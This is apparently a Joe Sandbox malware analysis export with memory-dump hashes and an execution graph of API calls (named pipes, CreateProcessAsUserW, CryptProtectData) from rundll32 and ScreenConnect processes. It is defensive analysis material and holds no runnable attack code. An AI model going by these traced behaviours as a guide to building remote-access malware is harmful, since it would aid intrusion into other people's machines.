                                                                                        • Instruction Fuzzy Hash: 75F0827130071057D7259A5EF894C9BBBDFEFC4660304853AE51AC7741EF65B8098BE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7421c625d1689858b78c3f6fbd6537a564debdaea10f520e5634923a6f257ecd
                                                                                        • Instruction ID: 9d0d9c86cb52614ea525ac09cb902d79d6889ea8b63a36cceeaa27e37f75bc24
                                                                                        • Opcode Fuzzy Hash: 7421c625d1689858b78c3f6fbd6537a564debdaea10f520e5634923a6f257ecd
                                                                                        • Instruction Fuzzy Hash: 01F05C367093405FD3019625F8049C3BBB6DFCA234F2000BAD50CCB253C9355C0ACBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 738da3e23e06fba94e0220e05972ab8b81d45d1fa05fde06e2bbf55cbc63beee
                                                                                        • Instruction ID: aeb7f60550b797cc0b6f5464320da8dc1156b7eda8b4d388200be4b632be19e3
                                                                                        • Opcode Fuzzy Hash: 738da3e23e06fba94e0220e05972ab8b81d45d1fa05fde06e2bbf55cbc63beee
                                                                                        • Instruction Fuzzy Hash: EFE092B071071622EF28216999453E668CD7B92644F0014BBE40AC2B82F9C4D84A13D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bacefbbfe6aace109e84216f7f26958db3083ecf0ab7bb657952d54e362b20fe
                                                                                        • Instruction ID: f8c7558eed830549c6e90c33b7d2a095620b60552c78fc6863547abf3a18692d
                                                                                        • Opcode Fuzzy Hash: bacefbbfe6aace109e84216f7f26958db3083ecf0ab7bb657952d54e362b20fe
                                                                                        • Instruction Fuzzy Hash: B5E0CD327013045BD314AA6AF854957F7AFEBCD625B20447DD60CD7356CE72AC46CA90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f33727e999495aebf32c535898df41d12612449562d95cb8099bd880e53bed8
                                                                                        • Instruction ID: 92dd15eb7efade504ae54e9bbdd5e99ef6efbebd6bfbf87b3c0bce9598b5c389
                                                                                        • Opcode Fuzzy Hash: 1f33727e999495aebf32c535898df41d12612449562d95cb8099bd880e53bed8
                                                                                        • Instruction Fuzzy Hash: 84E09230509249AFCB02CF68E91558EBFB5DF02214B00419AD409D7252EA316F04CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e4ef15117418ab9e7095ebea70eaf99613a8045d623f7c2ebda618322edabc0
                                                                                        • Instruction ID: 2e7582d9b9cd91cafa760e61b3833aa786235085a90f92af084f51fc3c664eb8
                                                                                        • Opcode Fuzzy Hash: 7e4ef15117418ab9e7095ebea70eaf99613a8045d623f7c2ebda618322edabc0
                                                                                        • Instruction Fuzzy Hash: 30D05E6BA1A3656BCF062175385A6F67F5CAB86420F0218F3E909CB283B8699D4603D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1ec6626795700ef7c941d472e460b104ccfd1f5fe788c9cb39888b8a998b99bc
                                                                                        • Instruction ID: 60312ca07241dbb4e49170558bca66a3b161769577dfe136b2d7191744c57f5a
                                                                                        • Opcode Fuzzy Hash: 1ec6626795700ef7c941d472e460b104ccfd1f5fe788c9cb39888b8a998b99bc
                                                                                        • Instruction Fuzzy Hash: FAE02B3320C2545FC3065B64B8194D57F79EB4A1203190063F841D72A2D9211D05C7E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29b138b2f507b7a8a3eb32bb55a8439c5489f8bd304acabe15747ebfea1b9e2a
                                                                                        • Instruction ID: 875323963bca9c9d497b5cddb0883aae899b8db23786ac8e5cdc79ece9690a01
                                                                                        • Opcode Fuzzy Hash: 29b138b2f507b7a8a3eb32bb55a8439c5489f8bd304acabe15747ebfea1b9e2a
                                                                                        • Instruction Fuzzy Hash: CFE0DFB1D05288EFCB00DFA4E98649C7FB8DF01200B0440FAD809CB202EA742F08C792
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b7fa5aefd70dfcd3a2b62ce07642e3ff9c5bff79e1712c28297c5b53edca6a2
                                                                                        • Instruction ID: 8fd35f9173110310b3bee8b61718186f571f9f23af4e6c44680642d68e020b1b
                                                                                        • Opcode Fuzzy Hash: 2b7fa5aefd70dfcd3a2b62ce07642e3ff9c5bff79e1712c28297c5b53edca6a2
                                                                                        • Instruction Fuzzy Hash: 28D0A77222051D5B4A046A18E9898AABB6AFB953617614837FA0593220CE716C058B96
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e1781f36629e1096e9a4359f2ac35bf5add13c574439b4709fcc851ecd2aa21b
                                                                                        • Instruction ID: 72aa676785d27b3ca0dbcf4239cc7356074cb861930ca8b9cd2e60dc5f5e3e94
                                                                                        • Opcode Fuzzy Hash: e1781f36629e1096e9a4359f2ac35bf5add13c574439b4709fcc851ecd2aa21b
                                                                                        • Instruction Fuzzy Hash: 9AD022EBB0FEFF2ACF1600783E000D64B080F82A21B1209F7C80CCB581800A4C0483E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bd69932b9be6ebf401856ffa66b2f2f6e9ebfe12721cb6a8d45940b1f4e7d25
                                                                                        • Instruction ID: d813e84fbc6e99f89caa7dd8f5b1e79d01c4a3c41ab3bb033c0a5c3cae62a46f
                                                                                        • Opcode Fuzzy Hash: 7bd69932b9be6ebf401856ffa66b2f2f6e9ebfe12721cb6a8d45940b1f4e7d25
                                                                                        • Instruction Fuzzy Hash: E1D0A736E6132573C900216915852BAB98DEB81110F015876AA0CD2204ED25D80102C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ddfbb5540b0325db7bdfa17dbad7e0ce52082f4f111961611f293bbe9c844e8
                                                                                        • Instruction ID: 030932b0b85fbb7c99fb0e5f3670e6a20463e96591b23174f47f02d77d34d4ce
                                                                                        • Opcode Fuzzy Hash: 4ddfbb5540b0325db7bdfa17dbad7e0ce52082f4f111961611f293bbe9c844e8
                                                                                        • Instruction Fuzzy Hash: 3BD01770A01208EFCB44DFA8EA4195DBBB9EB44204B1041A89809D7210EB316E04DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 425aad3920f9dc04a8ffa805ea39798cdb0a8f4406b215c898e39f532d558903
                                                                                        • Instruction ID: 34e199aae36899cf945facc4026e8e5d861dde2e7727d6f68966804f2b500c4e
                                                                                        • Opcode Fuzzy Hash: 425aad3920f9dc04a8ffa805ea39798cdb0a8f4406b215c898e39f532d558903
                                                                                        • Instruction Fuzzy Hash: 48D05EB0A0120CEFCF40DFE8EA8595DBBB9EF44304B1045BAD809D7200EA317F089B84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000003.2028907248.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_3_7590000_rundll32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66b9913a1377025912af0df2f4793657f903cb6af9ae3d01974874a786b61d27
                                                                                        • Instruction ID: 830b51f09b7187854dbcc345eca760330559214bf21fc426f82feec374116d5c
                                                                                        • Opcode Fuzzy Hash: 66b9913a1377025912af0df2f4793657f903cb6af9ae3d01974874a786b61d27
                                                                                        • Instruction Fuzzy Hash: CAC08C3242D3C08FE743CBA09895480BF71E96222534F82EBD042CA453C22D94CBCBB1

                                                                                        Execution Graph

                                                                                        Execution Coverage:11%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:2.8%
                                                                                        Total number of Nodes:248
                                                                                        Total number of Limit Nodes:16
                                                                                        execution_graph 36307 53101f0 36309 5310243 CreateProcessAsUserW 36307->36309 36310 53102d4 36309->36310 36539 53159c0 36540 53159de 36539->36540 36542 53159f7 36540->36542 36545 5315b11 36540->36545 36541 5315a20 36543 5315b11 3 API calls 36541->36543 36543->36542 36546 5315b78 WaitNamedPipeW 36545->36546 36548 5315b1a 36545->36548 36549 5315c04 36546->36549 36553 56c0380 36548->36553 36558 56c0371 36548->36558 36549->36541 36550 5315b6f 36550->36541 36554 56c0393 36553->36554 36563 56c03c4 36554->36563 36567 56c03d0 36554->36567 36555 56c03b8 36555->36550 36559 56c0380 36558->36559 36561 56c03c4 CreateFileA 36559->36561 36562 56c03d0 CreateFileA 36559->36562 36560 56c03b8 36560->36550 36561->36560 36562->36560 36564 56c03ca CreateFileA 36563->36564 36566 56c0505 36564->36566 36566->36555 36569 56c03da CreateFileA 36567->36569 36570 56c0505 36569->36570 36570->36555 36311 f536b0 36312 f536c6 36311->36312 36318 f54c63 36312->36318 36313 f53764 36314 f536cc 36314->36313 36323 f5e5c1 36314->36323 36315 f53739 36320 f54c90 36318->36320 36319 f54cc6 36319->36314 36320->36319 36321 f54d1d RtlGetVersion 36320->36321 36322 f54dda 36321->36322 36322->36314 36324 f5e5f4 36323->36324 36325 f5e60e 36323->36325 36324->36325 36328 f5ea77 36324->36328 36332 f5ea88 36324->36332 36325->36315 36330 f5eaae 36328->36330 36329 f5eae6 36329->36325 36330->36329 36336 f5eb31 36330->36336 36334 f5eaae 36332->36334 36333 f5eae6 36333->36325 36334->36333 36335 f5eb31 CreateNamedPipeW 36334->36335 36335->36333 36337 f5eb6e 36336->36337 36344 f5f768 36337->36344 36349 f5f758 36337->36349 36338 f5ee0f 36339 f5ed97 36339->36338 36354 3bd0948 36339->36354 36358 3bd0920 36339->36358 36345 f5f793 36344->36345 36346 f5f78c 36344->36346 36345->36339 36346->36345 36362 f5f901 36346->36362 36378 f5f910 36346->36378 36350 f5f793 36349->36350 36351 f5f78c 36349->36351 36350->36339 36351->36350 36352 f5f901 CreateNamedPipeW 36351->36352 36353 f5f910 CreateNamedPipeW 36351->36353 36352->36350 36353->36350 36355 3bd096d 36354->36355 36356 3bd0448 CreateNamedPipeW 36355->36356 36357 3bd0985 36356->36357 36357->36339 36359 3bd096d 36358->36359 36360 3bd0448 CreateNamedPipeW 36359->36360 36361 3bd0985 36360->36361 36361->36339 36364 f5f943 36362->36364 36365 f5f933 36362->36365 36363 f5f93c 36363->36345 36364->36365 36370 f5f910 CreateNamedPipeW 36364->36370 36374 f5f901 CreateNamedPipeW 36364->36374 36394 f5fa98 36364->36394 36409 f5fa88 36364->36409 36424 3bd47e0 36364->36424 36431 f5a4c8 36364->36431 36436 f5a4b8 36364->36436 36441 3bd47f0 36364->36441 36365->36363 36366 f5fa98 CreateNamedPipeW 36365->36366 36367 f5fa88 CreateNamedPipeW 36365->36367 36368 3bd47f0 CreateNamedPipeW 36365->36368 36369 3bd47e0 CreateNamedPipeW 36365->36369 36366->36365 36367->36365 36368->36365 36369->36365 36370->36365 36374->36365 36380 f5f943 36378->36380 36381 f5f933 36378->36381 36379 f5f93c 36379->36345 36380->36381 36386 f5f910 CreateNamedPipeW 36380->36386 36387 f5fa98 CreateNamedPipeW 36380->36387 36388 f5a4b8 CreateNamedPipeW 36380->36388 36389 3bd47f0 CreateNamedPipeW 36380->36389 36390 f5f901 CreateNamedPipeW 36380->36390 36391 f5fa88 CreateNamedPipeW 36380->36391 36392 f5a4c8 CreateNamedPipeW 36380->36392 36393 3bd47e0 CreateNamedPipeW 36380->36393 36381->36379 36382 f5fa98 CreateNamedPipeW 36381->36382 36383 f5fa88 CreateNamedPipeW 36381->36383 36384 3bd47f0 CreateNamedPipeW 36381->36384 36385 3bd47e0 CreateNamedPipeW 36381->36385 36382->36381 36383->36381 36384->36381 36385->36381 36386->36381 36387->36381 36388->36381 36389->36381 36390->36381 36391->36381 36392->36381 36393->36381 36395 f5fabb 36394->36395 36396 f5facb 36394->36396 36402 f5fac4 36395->36402 36405 f5f901 CreateNamedPipeW 36395->36405 36406 f5f910 CreateNamedPipeW 36395->36406 36407 f5fa98 CreateNamedPipeW 36395->36407 36408 f5fa88 CreateNamedPipeW 36395->36408 36397 f5fb0c 36396->36397 36398 f5f901 CreateNamedPipeW 36396->36398 36399 f5f910 CreateNamedPipeW 36396->36399 36400 f5fa98 CreateNamedPipeW 36396->36400 36401 f5fa88 CreateNamedPipeW 36396->36401 36397->36402 36448 f5ff12 36397->36448 36453 f5ff20 36397->36453 36398->36397 36399->36397 36400->36397 36401->36397 36402->36365 36405->36397 36406->36397 36407->36397 36408->36397 36410 f5fabb 36409->36410 36411 f5facb 36409->36411 36413 f5f901 CreateNamedPipeW 36410->36413 36414 f5f910 CreateNamedPipeW 36410->36414 36415 f5fa98 CreateNamedPipeW 36410->36415 36416 f5fa88 CreateNamedPipeW 36410->36416 36417 f5fac4 36410->36417 36412 f5fb0c 36411->36412 36420 f5f901 CreateNamedPipeW 36411->36420 36421 f5f910 CreateNamedPipeW 36411->36421 36422 f5fa98 CreateNamedPipeW 36411->36422 36423 f5fa88 CreateNamedPipeW 36411->36423 36412->36417 36418 f5ff20 CreateNamedPipeW 36412->36418 36419 f5ff12 CreateNamedPipeW 36412->36419 36413->36412 36414->36412 36415->36412 36416->36412 36417->36365 36418->36417 36419->36417 36420->36412 36421->36412 36422->36412 36423->36412 36426 3bd4824 36424->36426 36427 3bd4814 36424->36427 36425 3bd481d 36425->36365 36429 f5f901 CreateNamedPipeW 36426->36429 36430 f5f910 CreateNamedPipeW 36426->36430 36427->36425 36481 3bd6630 36427->36481 36429->36427 36430->36427 36432 f5a4f9 36431->36432 36433 f5a4ed 36431->36433 36432->36433 36434 3bd47f0 CreateNamedPipeW 36432->36434 36435 3bd47e0 CreateNamedPipeW 36432->36435 36433->36365 36434->36433 36435->36433 36437 f5a4f9 36436->36437 36438 f5a4ed 36436->36438 36437->36438 36439 3bd47f0 CreateNamedPipeW 36437->36439 36440 3bd47e0 CreateNamedPipeW 36437->36440 36438->36365 36439->36438 36440->36438 36443 3bd4824 36441->36443 36444 3bd4814 36441->36444 36442 3bd481d 36442->36365 36446 f5f901 CreateNamedPipeW 36443->36446 36447 f5f910 CreateNamedPipeW 36443->36447 36444->36442 36445 3bd6630 CreateNamedPipeW 36444->36445 36445->36442 36446->36444 36447->36444 36449 f5ff20 36448->36449 36458 3bd0438 36449->36458 36464 3bd0448 36449->36464 36450 f5ffb1 36450->36402 36454 f5ff3f 36453->36454 36456 3bd0438 CreateNamedPipeW 36454->36456 36457 3bd0448 CreateNamedPipeW 36454->36457 36455 f5ffb1 36455->36402 36456->36455 36457->36455 36459 3bd043b 36458->36459 36460 3bd03f7 36458->36460 36463 3bd046e 36459->36463 36468 5312f30 36459->36468 36472 5312f40 36459->36472 36463->36450 36465 3bd046e 36464->36465 36466 5312f30 CreateNamedPipeW 36464->36466 36467 5312f40 CreateNamedPipeW 36464->36467 36465->36450 36466->36465 36467->36465 36469 5312f40 36468->36469 36470 5312f75 36469->36470 36476 5312f80 36469->36476 36470->36463 36473 5312f52 36472->36473 36474 5312f75 36473->36474 36475 5312f80 CreateNamedPipeW 36473->36475 36474->36463 36475->36474 36477 5312fa8 36476->36477 36479 5313378 CreateNamedPipeW 36477->36479 36480 5313388 CreateNamedPipeW 36477->36480 36478 5312fe8 36478->36470 36479->36478 36480->36478 36482 3bd6670 36481->36482 36483 3bd0448 CreateNamedPipeW 36482->36483 36484 3bd668b 36483->36484 36484->36425 36485 3bd1638 36486 3bd167a 36485->36486 36487 3bd1680 CryptProtectData 36485->36487 36486->36487 36488 3bd16c3 36487->36488 36508 3bd5e68 36509 3bd5e9c 36508->36509 36511 3bd5e8c 36508->36511 36516 3bd642d 36509->36516 36524 3bd6498 36509->36524 36510 3bd5e95 36511->36510 36514 3bd642d CreateNamedPipeW 36511->36514 36515 3bd6498 CreateNamedPipeW 36511->36515 36514->36511 36515->36511 36517 3bd643d 36516->36517 36519 3bd64bb 36517->36519 36520 f5f901 CreateNamedPipeW 36517->36520 36521 f5f910 CreateNamedPipeW 36517->36521 36518 3bd64c4 36518->36511 36519->36518 36522 f5f901 CreateNamedPipeW 36519->36522 36523 f5f910 CreateNamedPipeW 36519->36523 36520->36519 36521->36519 36522->36519 36523->36519 36525 3bd64bb 36524->36525 36527 3bd64cb 36524->36527 36526 3bd64c4 36525->36526 36530 f5f901 CreateNamedPipeW 36525->36530 36531 f5f910 CreateNamedPipeW 36525->36531 36526->36511 36528 f5f901 CreateNamedPipeW 36527->36528 36529 f5f910 CreateNamedPipeW 36527->36529 36528->36525 36529->36525 36530->36525 36531->36525 36571 5312886 36572 531289a 36571->36572 36573 5312720 36572->36573 36575 f5f901 CreateNamedPipeW 36572->36575 36576 f5f910 CreateNamedPipeW 36572->36576 36574 53127ad 36573->36574 36577 3bd6630 CreateNamedPipeW 36573->36577 36575->36573 36576->36573 36577->36574 36489 5310cb8 36490 5310cca 36489->36490 36491 5310d0e 36490->36491 36493 5311121 36490->36493 36495 531115b 36493->36495 36494 53115a0 36495->36494 36498 f57481 36495->36498 36503 f57490 36495->36503 36499 f574ba 36498->36499 36500 f574d5 36499->36500 36501 f5f901 CreateNamedPipeW 36499->36501 36502 f5f910 CreateNamedPipeW 36499->36502 36500->36495 36501->36500 36502->36500 36504 f574ba 36503->36504 36505 f574d5 36504->36505 36506 f5f901 CreateNamedPipeW 36504->36506 36507 f5f910 CreateNamedPipeW 36504->36507 36505->36495 36506->36505 36507->36505 36532 5315798 36533 53157ec ConnectNamedPipe 36532->36533 36534 5315828 36533->36534 36534->36534 36535 56c2b40 36536 56c2b9a 36535->36536 36537 56c2bf9 RegDisablePredefinedCache 36536->36537 36538 56c2bdc 36536->36538 36537->36538 36585 3bd4c00 36586 3bd4c1c 36585->36586 36587 3bd4c3a 36585->36587 36586->36587 36589 3bd5508 36586->36589 36590 3bd5537 36589->36590 36591 3bd57eb 36590->36591 36594 3bd7150 36590->36594 36599 3bd7142 36590->36599 36596 3bd7178 36594->36596 36595 3bd7207 36595->36591 36596->36595 36597 f5fa98 CreateNamedPipeW 36596->36597 36598 f5fa88 CreateNamedPipeW 36596->36598 36597->36596 36598->36596 36601 3bd7178 36599->36601 36600 3bd7207 36600->36591 36601->36600 36602 f5fa98 CreateNamedPipeW 36601->36602 36603 f5fa88 CreateNamedPipeW 36601->36603 36602->36601 36603->36601

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 761 5311114-531360a 763 5313612-5313677 CreateNamedPipeW 761->763 764 531360c-531360f 761->764 766 5313680-53136a1 763->766 767 5313679-531367f 763->767 764->763 767->766
                                                                                        APIs
                                                                                        • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05313664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateNamedPipe
                                                                                        • String ID: 4L]q
                                                                                        • API String ID: 2489174969-261793533
                                                                                        • Opcode ID: 47f5c52062f7294eeb36e97f0164fe2f24013159e2c0cd2353318f23b516b5ee
                                                                                        • Instruction ID: 61fab77c5271d233e01e3128583965b604bf67c6321537a2c6c929c988bdfce9
                                                                                        • Opcode Fuzzy Hash: 47f5c52062f7294eeb36e97f0164fe2f24013159e2c0cd2353318f23b516b5ee
                                                                                        • Instruction Fuzzy Hash: 963124B18002489FCB14CF9AD488A8EBFF5FF48314F148459E958AB221D375A955CFA0
                                                                                        APIs
                                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 053102BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3297758805.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_5310000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 5b9503b85248063eaf34f437127501788e90b3d717dfac7c27d815b76656252a
                                                                                        • Instruction ID: b990d3faf841c6b26665be9077c41675a03081b5242fc81b9fb242f06ba59aa1
                                                                                        • Opcode Fuzzy Hash: 5b9503b85248063eaf34f437127501788e90b3d717dfac7c27d815b76656252a
                                                                                        • Instruction Fuzzy Hash: F5413476900209DFCF14CFA9C884ADEBBF6FF48310F14842AE918AB250D775A995CF90
                                                                                        APIs
                                                                                        • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03BD16AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3290717450.0000000003BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_3bd0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptDataProtect
                                                                                        • String ID:
                                                                                        • API String ID: 3091777813-0
                                                                                        • Opcode ID: 36b5ce07aacddd475b7305c21486877e42a6a64d2f6caee56647ed97f1a8cacb
                                                                                        • Instruction ID: a5bee7d00b76cd3f98c60082d7a48547e8e09a16dfa44bb7a430540e21f95852
                                                                                        • Opcode Fuzzy Hash: 36b5ce07aacddd475b7305c21486877e42a6a64d2f6caee56647ed97f1a8cacb
                                                                                        • Instruction Fuzzy Hash: 802125B6C0024A9FCF10CF9AC844ADEBBF1FF88310F148569E918A7210D739A555CFA1
                                                                                        APIs
                                                                                        • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03BD16AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3290717450.0000000003BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_3bd0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptDataProtect
                                                                                        • String ID:
                                                                                        • API String ID: 3091777813-0
                                                                                        • Opcode ID: c808a57d11dcf5db01fdf5cdb2bfff8b94a0b86a11b2923988e43eeb30b5849e
                                                                                        • Instruction ID: c4e087c80d0cdc6f819ad6526fc302456680f1b7aa3e6e6aad73f7e3d9248cd4
                                                                                        • Opcode Fuzzy Hash: c808a57d11dcf5db01fdf5cdb2bfff8b94a0b86a11b2923988e43eeb30b5849e
                                                                                        • Instruction Fuzzy Hash: 2A2115B68002499FDF10CF9AC844ADEFBF5FF88314F148469E918A7250D739A555CFA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 247 f54c63-f54cb3 252 f54cb5-f54cc4 call f54848 247->252 253 f54d02-f54d08 247->253 256 f54cc6-f54ccb 252->256 257 f54d09-f54dd8 RtlGetVersion 252->257 269 f54cce call f552f8 256->269 270 f54cce call f552e8 256->270 262 f54de1-f54e24 257->262 263 f54dda-f54de0 257->263 258 f54cd4 258->253 267 f54e26 262->267 268 f54e2b-f54e32 262->268 263->262 267->268 269->258 270->258
                                                                                        APIs
                                                                                        • RtlGetVersion.NTDLL(0000009C), ref: 00F54DBE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3270662511.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_f50000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID: `Q]q$`Q]q
                                                                                        • API String ID: 1889659487-3952371890
                                                                                        • Opcode ID: 31b8f57a4c176779647aeee41d9e161a2928d105d4d1ddd2d8f71fa281aab2f3
                                                                                        • Instruction ID: 6d44758a59bcdc5d10e3372ec6bea9c8be718d3247e793e6db1986f288f6676c
                                                                                        • Opcode Fuzzy Hash: 31b8f57a4c176779647aeee41d9e161a2928d105d4d1ddd2d8f71fa281aab2f3
                                                                                        • Instruction Fuzzy Hash: 4441BC70E002188FEB20DF68C809BAEBBB5FB45305F0085E9D50CA7280DB745E98CF92

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 680 56c03c4-56c03c8 681 56c03da-56c042c 680->681 682 56c03ca-56c03d9 680->682 684 56c042e-56c0453 681->684 685 56c0480-56c0503 CreateFileA 681->685 682->681 684->685 688 56c0455-56c0457 684->688 692 56c050c-56c054a 685->692 693 56c0505-56c050b 685->693 690 56c0459-56c0463 688->690 691 56c047a-56c047d 688->691 694 56c0465 690->694 695 56c0467-56c0476 690->695 691->685 700 56c054c-56c0550 692->700 701 56c055a-56c059c 692->701 693->692 694->695 695->695 696 56c0478 695->696 696->691 700->701 702 56c0552 700->702 705 56c059f-56c05aa 701->705 706 56c0553-56c0559 701->706 702->701 706->701
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 056C04ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.3298478700.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_56c0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: 4L]q
                                                                                        • API String ID: 823142352-261793533
                                                                                        • Opcode ID: b3da787346e7fb8a680f0478e1dc7af84e8d726965a07221bc305126b3128c1f
